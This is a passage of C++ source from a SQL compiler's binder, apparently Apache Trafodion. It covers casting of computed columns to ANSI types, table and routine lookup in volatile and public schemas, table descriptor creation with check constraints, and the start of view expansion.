((naType.getTypeQualifier() == NA_NUMERIC_TYPE) && (CmpCommon::context()->GetMode() == STMT_DYNAMIC)) { NumericType &nTyp = (NumericType &)col->getValueId().getType(); if ((outputFloattypeIEEE && (nTyp.getFSDatatype() == REC_TDM_FLOAT32 || nTyp.getFSDatatype() == REC_TDM_FLOAT64)) || (! outputFloattypeIEEE && (nTyp.getFSDatatype() == REC_IEEE_FLOAT32 || nTyp.getFSDatatype() == REC_IEEE_FLOAT64))) { NAType *newTyp; if (outputFloattypeIEEE) { // convert to IEEE floating point. newTyp = new (bindWA->wHeap()) SQLDoublePrecision(nTyp.supportsSQLnull(), bindWA->wHeap(), nTyp.getBinaryPrecision()); } else { // convert to Tandem floating point. if (nTyp.getFSDatatype() == REC_IEEE_FLOAT32) newTyp = new (bindWA->wHeap()) SQLRealTdm(nTyp.supportsSQLnull(), bindWA->wHeap(), nTyp.getBinaryPrecision()); else newTyp = new (bindWA->wHeap()) SQLDoublePrecisionTdm(nTyp.supportsSQLnull(), bindWA->wHeap(), nTyp.getBinaryPrecision()); } ItemExpr *ie = col->getValueId().getItemExpr(); ItemExpr *cast = new (bindWA->wHeap()) Cast(ie, newTyp, ITM_CAST); cast = cast->bindNode(bindWA); if (bindWA->errStatus()) return; col->setValueId(cast->getValueId()); compExpr[i] = cast->getValueId(); } } if (naType.getTypeQualifier() == NA_NUMERIC_TYPE && !((NumericType &)col->getValueId().getType()).binaryPrecision()) { NumericType &nTyp = (NumericType &)col->getValueId().getType(); ItemExpr * ie = col->getValueId().getItemExpr(); NAType *newTyp = NULL; Lng32 newPrec; Lng32 newScale; Lng32 oflow = -1; Lng32 bignumOflow = -1; NABoolean bignumIO = FALSE; if (CmpCommon::getDefault(BIGNUM_IO) == DF_ON) bignumIO = TRUE; // explicitely set to ON else if (CmpCommon::getDefault(BIGNUM_IO) == DF_OFF) bignumIO = FALSE; // explicitely set to OFF else if (CmpCommon::getDefault(BIGNUM_IO) == DF_SYSTEM) { if ((((NumericType &)col->getValueId().getType()).isBigNum()) && (((SQLBigNum &)col->getValueId().getType()).isARealBigNum())) bignumIO = TRUE; } if (CmpCommon::getDefaultNumeric(MAX_NUMERIC_PRECISION_ALLOWED) == MAX_HARDWARE_SUPPORTED_SIGNED_NUMERIC_PRECISION) bignumIO = FALSE; if (bignumIO) bignumOflow = nTyp.getPrecision() - (Lng32)CmpCommon::getDefaultNumeric(MAX_NUMERIC_PRECISION_ALLOWED); else { if (nTyp.isSigned()) oflow = nTyp.getPrecision() - MAX_HARDWARE_SUPPORTED_SIGNED_NUMERIC_PRECISION; else oflow = nTyp.getPrecision() - MAX_HARDWARE_SUPPORTED_UNSIGNED_NUMERIC_PRECISION; } if ((bignumOflow > 0) || (oflow > 0)) { if (bignumOflow > 0) { newPrec = (Lng32)CmpCommon::getDefaultNumeric(MAX_NUMERIC_PRECISION_ALLOWED); Lng32 orgMagnitude = nTyp.getPrecision() - nTyp.getScale(); // set the newScale // IF there is overflow in magnitude set the scale to 0. // ELSE set the accomodate the magnitude part and truncate the scale newScale = (orgMagnitude >= newPrec) ? 0 : newPrec - orgMagnitude ; if (newScale > newPrec) { *CmpCommon::diags() << DgSqlCode(-3015) << DgInt0(newScale) << DgInt1(newPrec); bindWA->setErrStatus(); return; } newTyp = new (bindWA->wHeap()) SQLBigNum(newPrec, newScale, ((SQLBigNum &)col->getValueId().getType()).isARealBigNum(), nTyp.isSigned(), nTyp.supportsSQLnull(), NULL); } else if (oflow > 0) { // If it's not a computed expr, but a column w/ a legal type, re-loop if (col->getValueId().getNAColumn(TRUE/*don't assert*/)) { //CMPASSERT(!nTyp.isInternalType()); //continue; } CMPASSERT(nTyp.isInternalType()); OperatorTypeEnum op = ie->origOpType(); CMPASSERT(op != NO_OPERATOR_TYPE && // Init'd correctly? op != ITM_RENAME_COL && // Expect these to have op != ITM_REFERENCE); // been bound, vanished. ItemExpr *ie2 = ie; while (op == ITM_INSTANTIATE_NULL) { ie2 = ie2->child(0).getPtr(); op = ie2->origOpType(); } // ANSI 6.5 SR 7 - 9: aggregates must be exact if column is exact. newPrec = MAX_NUMERIC_PRECISION; Lng32 orgMagnitude = (nTyp.getMagnitude() + 9) / 10; // set the newScale // IF there is overflow in magnitude set the scale to 0. // ELSE set the accomodate the magnitude part and truncate the scale newScale = (orgMagnitude >= newPrec) ? 0 : newPrec - orgMagnitude ; // Based on the CQD set the scale to MIN value. // CQD specifies the MIN scale that has to be preserved in case // of overflow. NADefaults &defs = ActiveSchemaDB()->getDefaults(); Lng32 minScale = defs.getAsLong(PRESERVE_MIN_SCALE); newScale = MAXOF(minScale, newScale); if (op == ITM_SUM || op == ITM_AVG) { // AVG = DIVIDE( SUM(), COUNT() ) ItemExpr *tmp = (op == ITM_SUM) ? ie2 : ie2->child(0).getPtr(); // // Now that we support OLAP functions, this may be // a pointer to an ITM_NOTCOVERED node. If so, we // need to check its child(0) node rather than // the ITM_NOTCOVERED node. // if (tmp->getOperatorType() == ITM_NOTCOVERED ) tmp = (Aggregate *)(ItemExpr *)tmp->child(0); CMPASSERT(tmp->isAnAggregate()); Aggregate *sum = (Aggregate *)tmp; ItemExpr *arg = (sum->getOriginalChild()) ? sum->getOriginalChild() : sum->child(0).getPtr(); if (arg->getValueId() == NULL_VALUE_ID) arg = sum->child(0).getPtr(); CMPASSERT(arg->getValueId() != NULL_VALUE_ID); Lng32 needScale = arg->getValueId().getType().getScale(); if (needScale > newPrec) needScale = newPrec; if (newScale < needScale || op == ITM_SUM) // ANSI 6.5 SR 9 b + c newScale = needScale; } if (newScale == 0) newTyp = new (bindWA->wHeap()) SQLLargeInt(TRUE, // hardware only supports signed nTyp.supportsSQLnull()); else newTyp = new (bindWA->wHeap()) SQLNumeric(sizeof(Int64), newPrec, newScale, nTyp.isSigned(), nTyp.supportsSQLnull()); } // overflow ItemExpr *cast = new (bindWA->wHeap()) Cast(ie, newTyp, ITM_CAST, TRUE/*checkForTrunc*/); cast = cast->bindNode(bindWA); if (bindWA->errStatus()) return; if (!col->getColRefNameObj().getColName().isNull()) { // We get here via CREATE VIEW v AS SELECT (expr op expr) AS nam ...; // ColumnDesc::setValueId() makes the RETDesc's XCNM inconsistent -- // but this is ok because name lookup over this XCNM doesn't happen // after the point we've gotten to here -- // a) if caller is StmtDDLCreateView::bindNode via RelRoot::bindNode, // there's no further lookup at all; // b) if caller is bindView(), then thanks to the way RenameTable // and RETDesc work, the inconsistent XCNM is not consulted // so we don't have to worry about this issue ... (for now anyhow!) } col->setValueId(cast->getValueId()); compExpr[i] = cast->getValueId(); } // overflow (bignum or regular) } // numeric } // loop over cols in RETDesc } // castComputedColumnsToAnsiTypes() desc_struct *generateSpecialDesc(const CorrName& corrName) { desc_struct * desc = NULL; if (corrName.getSpecialType() == ExtendedQualName::VIRTUAL_TABLE) { if (corrName.getQualifiedNameObj().getObjectName() == ExplainFunc::getVirtualTableNameStr()) { ExplainFunc ef; desc = ef.createVirtualTableDesc(); } else if (corrName.getQualifiedNameObj().getObjectName() == StatisticsFunc::getVirtualTableNameStr()) { StatisticsFunc sf; desc = sf.createVirtualTableDesc(); } } return desc; } // generateSpecialDesc() // ----------------------------------------------------------------------- // member functions for class BindWA // ----------------------------------------------------------------------- // LCOV_EXCL_START - cnu /* static NABoolean checkForReservedObjectName(QualifiedName &inName) { if ((inName.getCatalogName() == "NEO") && (inName.getSchemaName() == "PUBLIC_ACCESS_SCHEMA") && (inName.getObjectName() == "_MAINTAIN_CONTROL_INFO_")) { return TRUE; } return FALSE; } */ // LCOV_EXCL_STOP NARoutine *BindWA::getNARoutine ( const QualifiedName &name ) { NARoutineDBKey key(name, wHeap()); NARoutine * naRoutine = getSchemaDB()->getNARoutineDB()->get(this, &key); if (!naRoutine) { desc_struct *udfMetadata = NULL; CmpSeabaseDDL cmpSBD(STMTHEAP); udfMetadata = cmpSBD.getSeabaseRoutineDesc( name.getCatalogName(), name.getSchemaName(), name.getObjectName()); if (!udfMetadata) return NULL; NAHeap *routineHeap; if (getSchemaDB()->getNARoutineDB()->cachingMetaData()) { const Lng32 size = 16 * 1024; // The initial size routineHeap = new CTXTHEAP NAHeap("NARoutine Heap", (NAHeap *)CTXTHEAP, size); routineHeap->setJmpBuf(CmpInternalErrorJmpBufPtr); } else routineHeap=CmpCommon::statementHeap(); Int32 errors=0; naRoutine = new (routineHeap) NARoutine(name, udfMetadata, this, errors, routineHeap); if ( NULL == naRoutine || errors != 0) { setErrStatus(); return NULL; } // Add NARoutine to the NARoutineDB cache. if (getSchemaDB()->getNARoutineDB()->cachingMetaData()) getSchemaDB()->getNARoutineDB()->put(naRoutine); } return naRoutine; } NATable *BindWA::getNATable(CorrName& corrName, NABoolean catmanCollectTableUsages, // default TRUE desc_struct *inTableDescStruct) // default NULL { BindWA *bindWA = this; // for coding convenience NATable * table = NULL; // Search in volatile schema first. If not found, search in regular cat/sch. NABoolean volatileTableFound = FALSE; NAString userName; if ((CmpCommon::context()->sqlSession()->volatileSchemaInUse()) && (! inTableDescStruct) && (corrName.getSpecialType() != ExtendedQualName::VIRTUAL_TABLE)) { CorrName newCorrName = CmpCommon::context()->sqlSession()->getVolatileCorrName (corrName); if (bindWA->errStatus()) return NULL; //get NATable from cache table = bindWA->getSchemaDB()->getNATableDB()-> get(newCorrName, bindWA, inTableDescStruct); if (!table) { // now search in regular cat/sch. // clear diags area. CmpCommon::diags()->clear(); bindWA->resetErrStatus(); } else { NABoolean isValid = CmpCommon::context()->sqlSession()->validateVolatileCorrName (corrName); // if this table is found in volatile schema, then // make sure it is a volatile table. if ((isValid) && (NOT table->isVolatileTable())) { *CmpCommon::diags() << DgSqlCode(-4190) << DgTableName(table->getTableName(). getQualifiedNameAsAnsiString(TRUE)); bindWA->setErrStatus(); return NULL; } if (isValid) { newCorrName.setIsVolatile(TRUE); corrName = newCorrName; } else { // table was found in the volatile schema but it is // not a valid volatile name. // Look for it in regular schema. table = NULL; CmpCommon::diags()->clear(); bindWA->resetErrStatus(); // remember that volatile table was found so we // can generate a better error message later. volatileTableFound = TRUE; } } } if (! table) { // Expand the table (base table, view, etc.) name with // the default catalog and schema parts if the specified // table name does not include these parts. // This method will also first apply any prototype value (from a host var) // into the corrName's qualifiedName. // NABoolean catNameSpecified = (NOT corrName.getQualifiedNameObj().getCatalogName().isNull()); NABoolean schNameSpecified = (NOT corrName.getQualifiedNameObj().getSchemaName().isNull()); // try PUBLIC SCHEMA only when no schema was specified // and CQD PUBLIC_SCHEMA_NAME is specified NAString publicSchema = ""; CmpCommon::getDefault(PUBLIC_SCHEMA_NAME, publicSchema, FALSE); ComSchemaName pubSchema(publicSchema); NAString pubSchemaIntName = ""; if ( !schNameSpecified && !pubSchema.getSchemaNamePart().isEmpty() ) { pubSchemaIntName = pubSchema.getSchemaNamePart().getInternalName(); } corrName.applyDefaults(bindWA, bindWA->getDefaultSchema()); if (bindWA->errStatus()) return NULL; // prototype value parse error // override schema if ( ( overrideSchemaEnabled() ) // not volatile table && ( ! volatileTableFound ) ) { doOverrideSchema(corrName); } // if DEFAULT_SCHEMA_ACCESS_ONLY, can only access default and public schemas if (corrName.getSpecialType()==ExtendedQualName::NORMAL_TABLE) // NORMAL_TABLE also covers synonym, view and MV { if (violateAccessDefaultSchemaOnly(corrName.getQualifiedNameObj())) return NULL; } // make sure that schema name is not a VOLATILE SCHEMA if ((! bindWA->inDDL()) || ((bindWA->inViewDefinition()) || (bindWA->inMVDefinition()))) { if (! CmpCommon::context()->sqlSession()->validateVolatileQualifiedSchemaName (corrName.getQualifiedNameObj())) { bindWA->setErrStatus(); return NULL; } } //get NATable (from cache or from metadata) table = bindWA->getSchemaDB()->getNATableDB()-> get(corrName, bindWA, inTableDescStruct); //try the public schema if not found if ( !table && !pubSchemaIntName.isNull() ) { CorrName pCorrName(corrName); pCorrName.getQualifiedNameObj().setSchemaName(pubSchemaIntName); if ( !pubSchema.getCatalogNamePart().isEmpty() ) { pCorrName.getQualifiedNameObj().setCatalogName( pubSchema.getCatalogNamePart().getInternalName()); } bindWA->resetErrStatus(); table = bindWA->getSchemaDB()->getNATableDB()-> get(pCorrName, bindWA, inTableDescStruct); if ( !bindWA->errStatus() && table ) { // if found in public schema, do not show previous error // and replace corrName CmpCommon::diags()->clear(); corrName.getQualifiedNameObj().setCatalogName( pCorrName.getQualifiedNameObj().getCatalogName()); corrName.getQualifiedNameObj().setSchemaName( pCorrName.getQualifiedNameObj().getSchemaName()); } } // move to here, after public schema try because BindUtil_CollectTableUsageInfo // saves table info for mv definition, etc. // Conditionally (usually) do stuff for Catalog Manager (static func above). if (catmanCollectTableUsages) if (corrName.getSpecialType() != ExtendedQualName::TRIGTEMP_TABLE) BindUtil_CollectTableUsageInfo(bindWA, corrName); if (!table) { if (volatileTableFound) { if ((CmpCommon::diags()->mainSQLCODE() == -1003) && (NOT catNameSpecified)) { // the name is in true USER_NAME.VOL_TAB_NAME form // where the USER_NAME doesn't match current name. // Clear errors and return an appropriate message. CmpCommon::diags()->clear(); CmpCommon::context()->sqlSession()->validateVolatileCorrName (corrName); bindWA->setErrStatus(); } } return NULL; } } // if a volatile table is found, make sure that volatile schema is in // use and volatile tables are allowed. if ((table) && (table->isVolatileTable())) { // set volatile table indication in table's tablename ((QualifiedName&)(table->getTableName())).setIsVolatile(TRUE); } // For now, don't allow access through the Trafodion external name created for // native HIVE or HBASE objects unless the allowExternalTables flag is set. // allowExternalTables is set for drop table and SHOWDDL statements. // TDB - may want to merge the Trafodion version with the native version. if ((table) && table->isExternalTable() && (! bindWA->allowExternalTables())) { *CmpCommon::diags() << DgSqlCode(-4258) << DgTableName(table->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } // If the table is an external table and has an associated native table, // check to see if the external table structure still matches the native table. // If not, return an error if ((table) && table->isExternalTable()) { NAString adjustedName =ComConvertTrafNameToNativeName (table->getTableName().getCatalogName(), table->getTableName().getUnqualifiedSchemaNameAsAnsiString(), table->getTableName().getUnqualifiedObjectNameAsAnsiString()); // Get a description of the associated Trafodion table Int32 numNameParts = 3; QualifiedName adjustedQualName(adjustedName,numNameParts,STMTHEAP, bindWA); CorrName externalCorrName(adjustedQualName, STMTHEAP); NATable *nativeNATable = bindWA->getSchemaDB()->getNATableDB()-> get(externalCorrName, bindWA, inTableDescStruct); // Compare column lists // TBD - return what mismatches if ( nativeNATable && !(table->getNAColumnArray() == nativeNATable->getNAColumnArray())) { *CmpCommon::diags() << DgSqlCode(-3078) << DgString0(adjustedName) << DgTableName(table->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); nativeNATable->setRemoveFromCacheBNC(TRUE); return NULL; } } HostVar *proto = corrName.getPrototype(); if (proto && proto->isPrototypeValid()) corrName.getPrototype()->bindNode(bindWA); // This test is not "inAnyConstraint()" because we DO want to increment // the count for View With Check Option constraints. if (!getCurrentScope()->context()->inTableCheckConstraint() && !getCurrentScope()->context()->inRIConstraint()) table->incrReferenceCount(); if (table) OSIM_captureTableOrView(table); return table; } // BindWA::getNATable() static TableDesc *createTableDesc2(BindWA *bindWA, const NATable *naTable, CorrName &corrName, Hint *hint) { // Allocate a base table descriptor. // TableDesc *tdesc = new (bindWA->wHeap()) TableDesc(bindWA, naTable, corrName); // Insert the table name into the XTNM. // bindWA->getCurrentScope()->getXTNM()->insertNames(bindWA, corrName); if (bindWA->errStatus()) return NULL; // For each NAColumn, allocate a BaseColumn, bind the BaseColumn, and // add the ValueId to the TableDesc. // CollIndex i = 0; for (i = 0; i < naTable->getColumnCount(); i++) { BaseColumn *baseCol = new (bindWA->wHeap()) BaseColumn(tdesc, i); baseCol->bindNode(bindWA); if (bindWA->errStatus()) return NULL; ValueId valId = baseCol->getValueId(); tdesc->addToColumnList(valId); } // set primary key for this table tdesc->setPrimaryKeyColumns(); // For each index, create an IndexDesc. // NAString indexChoice; NADefaults &defs = ActiveSchemaDB()->getDefaults(); defs.getValue(HIDE_INDEXES,indexChoice); for (i = 0; i < naTable->getIndexList().entries(); i++) { NAFileSet *nfs=naTable->getIndexList()[i]; IndexDesc *idesc = new (bindWA->wHeap()) IndexDesc(tdesc, nfs, bindWA->currentCmpContext()); if (naTable->getClusteringIndex()->getFileSetName() == idesc->getIndexName()) { tdesc->setClusteringIndex(idesc); idesc->markAsClusteringIndex(); } if(indexChoice.compareTo("NONE") ==0 OR indexChoice.compareTo("VERTICAL") ==0 OR (indexChoice.compareTo("KEYINDEXES") ==0 AND tdesc->isKeyIndex(idesc)) OR naTable->getClusteringIndex()->getFileSetName() == nfs->getFileSetName()) { tdesc->addIndex(idesc); // implementation of optimizer hints if (hint AND hint->hasIndexHint (idesc->getNAFileSet()->getExtFileSetName())) { tdesc->addHintIndex(idesc); } if (idesc->isUniqueIndex() ) tdesc->addUniqueIndex(idesc); } else { delete idesc; } } // For each vertical partition, create an IndexDesc. // Add this VP to the list of VPs for the TableDesc. for (i = 0; i < naTable->getVerticalPartitionList().entries(); i++) { if(indexChoice.compareTo("NONE") ==0 OR indexChoice.compareTo("INDEXES")==0 OR indexChoice.compareTo("KEYINDEXES")==0) { IndexDesc *idesc = new (bindWA->wHeap()) IndexDesc(tdesc, naTable->getVerticalPartitionList()[i], bindWA->currentCmpContext()); tdesc->addVerticalPartition(idesc); } } // Allocate a RETDesc, attach it to the BindScope. // bindWA->getCurrentScope()->setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, tdesc)); // Do not include tables-referenced-in-a-constraint (when/if we allow them) // in the view-contains-table list; if we did include them, then // TableViewUsageList::getViewsOnTable() would give wrong results // for where it's used to prevent the Halloween problem. // // If we end up needing this extra info, I advise either a separate list, // or a new field in TableViewUsage indicating usage type (containment // versus reference), enhancing method getViewsOnTable() accordingly. // if (!bindWA->getCurrentScope()->context()->inAnyConstraint()) bindWA->tableViewUsageList().insert(new (bindWA->wHeap()) TableViewUsage( tdesc->getCorrNameObj().getQualifiedNameObj(), tdesc->getCorrNameObj().getSpecialType(), naTable->getViewText() != NULL, bindWA->viewCount())); return tdesc; } // static createTableDesc2() TableDesc *BindWA::createTableDesc(const NATable *naTable, CorrName &corrName, NABoolean catmanCollectUsages, Hint *hint) { BindWA *bindWA = this; // for coding convenience TableDesc *tdesc = createTableDesc2(bindWA, naTable, corrName, hint); if (bindWA->errStatus()) return NULL; // Now bind any table check constraints and attach them to our new tdesc. // These constraints must be processed for UPDATE and INSERT. // DELETEs must clear them; see Delete::bindNode. // // For SELECTs, NOT NULL constraints are marked on the NAColumn::allowsNulls // allowing more elaborate Transformations. For SELECTs, other types of // constraints are not currently used, but could be in future, // to optimize by providing additional predicate/selectivity info. // // ## We ought to write some regression test cases like // INSERT INTO T (SELECT * FROM S) -- T's constraints yes, S irrelevant // INSERT INTO T VALUES ((SELECT A FROM S WHERE..),..) // INSERT INTO V3 ... -- underlying basetbl's constrts yes // -- V3 atop VA atop T: let the views be // -- WITH CHECK OPTION, then viewpred-constrt yes // const CheckConstraintList &ccl = naTable->getCheckConstraints(); if (ccl.entries()) { // Table check constraint text is stored in the metadata tables // with the underlying table/view name (e.g. "CHECK (C.S.T.COL > 0)"), // whereas any correlation name in a query // (e.g. "SELECT * FROM C.S.T FOO WHERE COL < 10") // is irrelevant to the persistent constraint text -- // when binding the check constraint, we want to find column C.S.T.COL, // while the TableDesc/RETDesc just built only exposes the column // under names COL and FOO.COL. // // So, if we have a correlation name, we must: // - rename our TableDesc (rename FOO to C.S.T) // - create a temporary table name scope for C.S.T that will hide FOO // - construct a temporary RETDesc with names COL, T.COL, S.T.COL, C.S.T.COL // but the same ValueId's they had before // // Then we bind the constraints using that RETDesc for name lookups. // // Then for the non-empty correlation, reset/undo the temporary stuff. RETDesc *savedRETDesc = NULL; NABoolean corrNameIsNonEmpty = !corrName.getCorrNameAsString().isNull(); CorrName synonymReferenceCorrName; if(naTable->getIsSynonymTranslationDone()){ QualifiedName baseQualifiedName(naTable->getSynonymReferenceName(),3); synonymReferenceCorrName=baseQualifiedName; } if ((corrNameIsNonEmpty) || (naTable->getIsSynonymTranslationDone())) { CorrName baseCorrName; baseCorrName = (naTable->getIsSynonymTranslationDone()) ? synonymReferenceCorrName : naTable->getTableName(); tdesc->setCorrName(baseCorrName); bindWA->getCurrentScope()->xtnmStack()->createXTNM(); bindWA->getCurrentScope()->getXTNM()->insertNames(bindWA, baseCorrName); if (bindWA->errStatus()) return NULL; savedRETDesc = bindWA->getCurrentScope()->getRETDesc(); bindWA->getCurrentScope()->setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, tdesc)); if (bindWA->errStatus()) return NULL; } for (CollIndex i = 0; i < ccl.entries(); i++) { ItemExpr *constraintPred = bindCheckConstraint(bindWA, ccl[i], naTable, catmanCollectUsages); if (constraintPred) tdesc->addCheckConstraint(bindWA, naTable, ccl[i], constraintPred); else if (bindWA->errStatus()) break; } if ((corrNameIsNonEmpty) || (naTable->getIsSynonymTranslationDone())){ // reset temporaries tdesc->setCorrName(corrName); delete bindWA->getCurrentScope()->getRETDesc(); bindWA->getCurrentScope()->setRETDesc(savedRETDesc); bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); } } // check constraint processing required // if the table contains computed columns, bind the expressions to compute the columns for (CollIndex c = 0; c < naTable->getColumnCount(); c++) { NAColumn *nac = tdesc->getNATable()->getNAColumnArray()[c]; if (nac->isComputedColumn()) { ItemExpr *computedColumnExpr = NULL; Parser parser(bindWA->currentCmpContext()); // parse the text stored in the NAColumn computedColumnExpr = parser.getItemExprTree( nac->getComputedColumnExprString(), str_len(nac->getComputedColumnExprString()), CharInfo::UTF8); if (computedColumnExpr) { ParNameLocList *saveNameLocList = bindWA->getNameLocListPtr(); bindWA->setNameLocListPtr(NULL); bindWA->getCurrentScope()->context()->inComputedColumnExpr() = TRUE; computedColumnExpr = computedColumnExpr->bindNode(bindWA); bindWA->setNameLocListPtr(saveNameLocList); bindWA->getCurrentScope()->context()->inComputedColumnExpr() = FALSE; if (bindWA->errStatus()) { delete computedColumnExpr; computedColumnExpr = NULL; return NULL; } else { // Store the expression tree in the base column ((BaseColumn *) tdesc->getColumnList()[c].getItemExpr())-> setComputedColumnExpr(computedColumnExpr->getValueId()); } } } } return tdesc; } // BindWA::createTableDesc() // QSTUFF - helper for BindWA::bindView. static void propagateDeleteAndStream(RelExpr *re, GroupAttributes *ga) { if (ga->isEmbeddedUpdateOrDelete()) re->getGroupAttr()->setEmbeddedIUD( ga->getEmbeddedIUD()); if (ga->isStream()) re->getGroupAttr()->setStream(TRUE); if (ga->isSkipInitialScan()) re->getGroupAttr()->setSkipInitialScan(TRUE); Int32 arity = re->getArity(); for (Int32 i = 0; i < arity; i++) { if (re->child(i)) propagateDeleteAndStream(re->child(i), ga); } } RelExpr *BindWA::bindView(const CorrName &viewName, const NATable *naTable, const StmtLevelAccessOptions &accessOptions, ItemExpr *predicate, GroupAttributes *groupAttrs, NABoolean catmanCollectUsages) { BindWA *bindWA = this; // for coding convenience CMPASSERT(viewName.getQualifiedNameObj() == naTable->getTableName()); NABoolean inViewExpansion = bindWA->setInViewExpansion(TRUE); // QSTUFF // set a flag for overrride_schema //if (overrideSchemaEnabled()) bindWA->getCurrentScope()->setInViewExpansion(TRUE); if (!bindWA->getCurrentScope()->context()->inAnyConstraint()) bindWA->tableViewUsageList().insert(new (bindWA->wHeap()) TableViewUsage( viewName.getQualifiedNameObj(), viewName.getSpecialType(), TRUE/*isView*/, bindWA->viewCount())); // save the current parserflags setting ULng32 savedParserFlags = Get_SqlParser_Flags (0xFFFFFFFF); // allow funny characters in the tablenames used in the select list. // This enables views to be created on 'internal' secret table // so they could be accessed. // At view creation time, the caller still need to set this // parserflag from the sql interface(mxci, etc) otherwise the view // creation will fail. Since parserflags can only be set by super // users, the view with special tablenames could only have been created // by a super user. Set_SqlParser_Flags(ALLOW_FUNNY_IDENTIFIER); // Parse the view text. // // isolation level and order by are allowed in create view, if // the corresponding cqds are set. // These cqds are only valid during 'create view' time. Once the views // are created, we don't need to look at them. // During view expansion when we reach this method, turn the cqds on if // they are not already on, so parser doesn't return an error. // Reset them back, if they were set here. NABoolean allowIsolationLevelWasSet = FALSE; NABoolean allowOrderByWasSet = FALSE; if (CmpCommon::getDefault(ALLOW_ISOLATION_LEVEL_IN_CREATE_VIEW) == DF_OFF) { allowIsolationLevelWasSet = TRUE; NAString op("ON"); ActiveSchemaDB()->getDefaults().validateAndInsert ("ALLOW_ISOLATION_LEVEL_IN_CREATE_VIEW", op, FALSE); } if (CmpCommon::getDefault(ALLOW_ORDER_BY_IN_CREATE_VIEW) == DF_OFF) { allowOrderByWasSet = TRUE; NAString op("ON"); ActiveSchemaDB()->getDefaults().validateAndInsert ("ALLOW_ORDER_BY_IN_CREATE_VIEW", op, FALSE); } Parser parser(bindWA->currentCmpContext()); ExprNode *viewTree = parser.parseDML(naTable->getViewText(), naTable->getViewLen(), naTable->getViewTextCharSet()); // Restore parser flags settings to what they originally were Set_SqlParser_Flags (savedParserFlags); if (allowIsolationLevelWasSet) { NAString op("OFF"); ActiveSchemaDB()->getDefaults().validateAndInsert ("ALLOW_ISOLATION_LEVEL_IN_CREATE_VIEW", op, FALSE); } if (allowOrderByWasSet) { NAString op("OFF"); ActiveSchemaDB()->getDefaults().validateAndInsert ("ALLOW_ORDER_BY_IN_CREATE_VIEW", op, FALSE); } if (NOT viewTree) { bindWA->setErrStatus(); return NULL; } // Remove the StmtQuery node. // Clear the root flag in the RelRoot node since this not the topmost // RelRoot in the query tree. // CMPASSERT(viewTree->getOperatorType() == STM_QUERY); RelExpr *queryTree = viewTree->castToStatementExpr()->getQueryExpression(); CMPASSERT(queryTree->getOperatorType() == REL_ROOT); ((RelRoot *)queryTree)->setRootFlag(FALSE); CMPASSERT(queryTree->getChild(0)->getOperatorType() == REL_DDL); StmtDDLCreateView *createViewTree = ((DDLExpr *)(queryTree->getChild(0)))-> getDDLNode()->castToStmtDDLNode()->castToStmtDDLCreateView(); CMPASSERT(createViewTree); queryTree = createViewTree->getQueryExpression(); CMPASSERT(queryTree->getOperatorType() == REL_ROOT); ((RelRoot *)queryTree)->setRootFlag(FALSE); RelRoot *viewRoot = (RelRoot *)queryTree; // save for add'l binding below ParNameLocList *saveNameLocList = bindWA->getNameLocListPtr(); // This was put here for Genesis 10-980217-0467. // Now with the fix for 10-980408-5149, we even more strongly need to bypass // or ignore any accessOpts from the view, for a consistent access model. if ((CmpCommon::getDefault(ALLOW_ISOLATION_LEVEL_IN_CREATE_VIEW) == DF_OFF) || (viewRoot->accessOptions().accessType() == ACCESS_TYPE_NOT_SPECIFIED_)) { // if cqd is set and view options were explicitely specified, // then do not overwrite it with accessOptions. viewRoot->accessOptions() = accessOptions; } // Set the WCO context (Genesis 10-971112-7028 + 10-990518-8420): // If this view is WITH CHECK OPTION, then all views below it acquire // check-option-ness, per Ansi 11.19 GR 9-11a // (we implement only CASCADED -- see further notes later on in this func); // if some view above this one is WCO, then this view effectively is too, // regardless of its getViewCheck() value. // Genesis 10-990518-8420 fix in particular: // with-check-option views of the form // SELECT..FROM(SELECT..WHERE p1)REN WHERE p2 // were emitting a bind error on pred p1, and ignoring pred p2! // NABoolean topmostViewWithCheckOption = FALSE; if (naTable->getViewCheck() && bindWA->getCurrentScope()->context()->inUpdateOrInsert() && !bindWA->inViewWithCheckOption()) { topmostViewWithCheckOption = TRUE; bindWA->inViewWithCheckOption() = naTable; } // QSTUFF // Give the new query tree the pubsub group attrs before // binding, so that binder checks are applied to the new tree. if ((groupAttrs) && (groupAttrs->isEmbeddedUpdateOrDelete() || groupAttrs->isStream())) propagateDeleteAndStream(queryTree,groupAttrs); // ************ THE FIRST OF TWO BINDNODE'S ************ // Bind the basic queryTree first (before Rename), for stoi_ security stuff. // Cascade the WCO-ness down to RelExpr::bindSelf which captures predicates. // On this bind, unconditionally we never collect usages. // bindWA->viewCount()++; bindWA->setNameLocListPtr(NULL); // do not collect usages for catman queryTree = queryTree->bindNode(bindWA); if (bindWA->errStatus()) return NULL; bindWA->setNameLocListPtr(saveNameLocList); bindWA->viewCount()--; if (bindWA->errStatus()) return NULL; // if RelRoot has an order by, insert a Logical Sort node below it // and move the order by expr from view root to this sort node. // The view root node is eliminated during transformation/normalization // and the sortlogical node provides a place to 'hold' the order by expr. // During transformation, this sort key is moved from the sortlogical node // to the root node of the query, if there is no explicit order by // specified as part of the query. // SortLogical node is a shortlived node and is eliminated during // the normalization phase. if (viewRoot->hasOrderBy()) { RelExpr * sortNode = new (bindWA->wHeap()) SortLogical(queryTree->child(0)->castToRelExpr(), viewRoot->reqdOrder(), bindWA->wHeap()); sortNode = sortNode->bindNode(bindWA); if (bindWA->errStatus()) return NULL; viewRoot->removeOrderByTree(); viewRoot->reqdOrder().clear(); viewRoot->setChild(0, sortNode); } // Insert a RenameTable node above the view tree. // const NAColumnArray &columns = naTable->getNAColumnArray(); ItemExpr *columnList = new (bindWA->wHeap()) RenameCol(NULL, new (bindWA->wHeap()) ColRefName(columns[0]->getColName(), bindWA->wHeap())); // CollIndex i = 1; for (i = 1; i < naTable->getColumnCount(); i++) columnList = new (bindWA->wHeap()) ItemList(columnList, new (bindWA->wHeap()) RenameCol(NULL, new (bindWA->wHeap()) ColRefName(columns[i]->getColName(), bindWA->wHeap()))); // queryTree = new (bindWA->wHeap()) RenameTable(TRUE/*copy tableName as is*/, queryTree->castToRelExpr(), viewName, columnList, bindWA->wHeap(), TRUE/*isView*/); if (predicate) queryTree->addSelPredTree(predicate); ((RenameTable *) queryTree)->setViewNATable(naTable); // this query used this view appendViewName (viewName.getQualifiedNameObj().getQualifiedNameAsAnsiString().data()); // set a flag for overrride_schema // with the call to bindNode below, only the Rename node will be bound. // 